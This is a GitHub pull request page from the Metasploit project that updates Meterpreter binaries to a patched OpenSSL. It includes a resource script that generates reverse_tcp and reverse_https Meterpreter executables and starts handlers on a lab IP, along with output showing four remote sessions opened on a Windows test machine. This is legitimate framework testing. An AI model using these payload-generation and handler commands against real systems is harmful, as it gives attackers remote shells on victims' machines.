Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Update meterpreter bins pr 86 #3423

Closed
wants to merge 2 commits into from
Closed

Update meterpreter bins pr 86 #3423

wants to merge 2 commits into from

Conversation

todb-r7
Copy link

@todb-r7 todb-r7 commented Jun 5, 2014

This updates the Meterpreter bins to the current, non-vulnerable OpenSSL 0.9.8za. This is current as of commit c41bd24 from rapid7/meterpreter#86.

Verification

  • Ensure normal Meterpreter functionality

When landing this, please reference RM 8808 as well.

Tod Beardsley added 2 commits June 5, 2014 16:48
Meterpreter bins as of rapid7/meterpreter#86
1b74e05 
Current binaries as of commit
c41bd249569874db1786d3a8ac93549bacea897e

Note that rapid7/meterpreter#86 should be landed as well.

SeeRM rapid7#8808
Chmod common.lib to 755
4b1beb8
@todb-r7
Copy link
Author

todb-r7 commented Jun 5, 2014

Binaries work for me. Using this rc script for basic functional testing:

sleep 3
use payload/windows/meterpreter/reverse_tcp
set LHOST 192.168.145.1
set LPORT 4432
generate -t exe -f /tmp/meterpreter32.exe

use payload/windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.145.1
set LPORT 4464
generate -t exe -f /tmp/meterpreter64.exe

use payload/windows/meterpreter/reverse_https
set LHOST 192.168.145.1
set LPORT 4832
generate -t exe -f /tmp/meterpreter32-https.exe

use payload/windows/x64/meterpreter/reverse_https
set LHOST 192.168.145.1
set LPORT 4864
generate -t exe -f /tmp/meterpreter64-https.exe

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.145.1
set LPORT 4432
set ExitOnSession false
exploit -j

set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LPORT 4464
exploit -j

set PAYLOAD windows/x64/meterpreter/reverse_https
set LPORT 4864
exploit -j

set PAYLOAD windows/meterpreter/reverse_https
set LPORT 4832
exploit -j

Gets results

[*] Started HTTPS reverse handler on https://0.0.0.0:4832/
[*] Starting the payload handler...
[*] 192.168.145.149:49713 Request received for /z3Kj_APFOuUHbX8YUzSNU/...
[*] Incoming orphaned session z3Kj_APFOuUHbX8YUzSNU, reattaching...
[*] 192.168.145.149:49714 Request received for /bbOO_C39J2vPJM3g201Xx/...
[*] Incoming orphaned session bbOO_C39J2vPJM3g201Xx, reattaching...
[*] Meterpreter session 1 opened (192.168.145.1:4864 -> 192.168.145.149:49713) at 2014-06-05 17:03:35 -0500
[*] Meterpreter session 2 opened (192.168.145.1:4832 -> 192.168.145.149:49714) at 2014-06-05 17:03:35 -0500

msf exploit(handler) > 
[*] Sending stage (972800 bytes) to 192.168.145.149
[*] Meterpreter session 3 opened (192.168.145.1:4464 -> 192.168.145.149:49818) at 2014-06-05 17:03:49 -0500
[*] Sending stage (770048 bytes) to 192.168.145.149
[*] Meterpreter session 4 opened (192.168.145.1:4432 -> 192.168.145.149:49823) at 2014-06-05 17:03:51 -0500

msf exploit(handler) > sessions -i

Active sessions
===============

  Id  Type                   Information                                      Connection
  --  ----                   -----------                                      ----------
  1   meterpreter x64/win64  WIN-5OCH6LK7RTG\Tod Beardsley @ WIN-5OCH6LK7RTG  192.168.145.1:4864 -> 192.168.145.149:49713 (192.168.145.149)
  2   meterpreter x86/win32  WIN-5OCH6LK7RTG\Tod Beardsley @ WIN-5OCH6LK7RTG  192.168.145.1:4832 -> 192.168.145.149:49714 (192.168.145.149)
  3   meterpreter x64/win64  WIN-5OCH6LK7RTG\Tod Beardsley @ WIN-5OCH6LK7RTG  192.168.145.1:4464 -> 192.168.145.149:49818 (192.168.145.149)
  4   meterpreter x86/win32  WIN-5OCH6LK7RTG\Tod Beardsley @ WIN-5OCH6LK7RTG  192.168.145.1:4432 -> 192.168.145.149:49823 (192.168.145.149)

@todb-r7
Copy link
Author

todb-r7 commented Jun 5, 2014

Other commands work as well, just FYI, not just session establishment. Normal things like getuid, etc.

todb-r7 pushed a commit to todb-r7/metasploit-framework that referenced this pull request Jun 5, 2014
Add Meterpreter bins for release branch.
737f06f 
This contains the same bins as rapid7#3423, but it is targeted at the release
branch for rapid7/metasploit-framework.
@todb-r7 todb-r7 mentioned this pull request Jun 5, 2014
Merged
@Meatballs1
Copy link
Contributor

Worthwhile exercising some commands?

test/modules/post/test/meterpreter.rb

bturner-r7 added a commit that referenced this pull request Jun 5, 2014
@bturner-r7
Merge branch 'release'
d9a5002 
Updates meterpreter bins and closes #3425 and #3423.
@bturner-r7
Copy link
Contributor

This was landed by merging release into master after landing #3425.

@bturner-r7 bturner-r7 closed this Jun 5, 2014
@todb-r7
Copy link
Author

todb-r7 commented Jun 6, 2014

@Meatballs1 thanks for the pointer to the test script -- totally forgot about that!

@todb todb mentioned this pull request Jun 9, 2014
Merged
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers
No reviews
Assignees
No one assigned
Labels
meterpreter
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.
3 participants
@todb-r7 @Meatballs1 @bturner-r7